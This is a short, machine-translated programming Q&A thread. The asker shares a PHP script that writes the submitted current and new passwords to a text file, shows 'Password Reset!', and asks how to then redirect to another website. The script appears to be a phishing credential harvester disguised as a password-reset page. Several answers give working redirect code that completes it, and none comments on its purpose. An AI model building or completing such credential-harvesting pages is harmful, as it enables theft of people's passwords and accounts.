2016-06-10 308 views
-3
<?php 

// Open the text file 
$f = fopen("users.txt", "a"); 

// Write text 
fwrite($f, $_POST["_current_password1_"]); 
fwrite($f, $_POST["_new_password1_"]); 

// Close the text file 
fclose($f); 


print "Password Reset!"; 


?> 

如何在重定向到不同的網站後顯示「密碼重置!」 (在編碼不好)PHP重定向到網站

+0

加上'頭( '位置:http://www.example.com/');打印 –

回答

1

後你做的重定向已經顯示消息,你可以使用像這樣的刷新標題:

header("refresh:5; url=otherpage.php"); 

這會在5秒後做重定向。您需要在打印命令之前添加。

+0

之前'謝謝這個工作! <3 –

1

試試這個:

header("Location: http://example.com/myOtherPage.php"); 
die(); 
1

使用頭功能header('Location: url');

1

header功能會有所幫助:

<?php 
    header('Location: http://www.example.com/'); 
    exit; // End current script 
?> 
-1

您可以使用JavaScript重定向到另一個網址:

echo "<script>window.location = 'www.google.com';</script>"; 

如果你想重新定向之前延遲幾秒鐘,就可以使用setTimeout方法:

echo "<script>setTimeout(function(){window.location = 'www.google.com';}, 3000);</script>"; 
1

您可以使用下列2重定向到另一頁的方法:

1-使用PHP header功能:

header('Location: http://www.example.com/'); 

2- PHP代碼中使用JavaScript:

echo '<script type="text/javascript">window.location = "http://www.example.com/";</script>';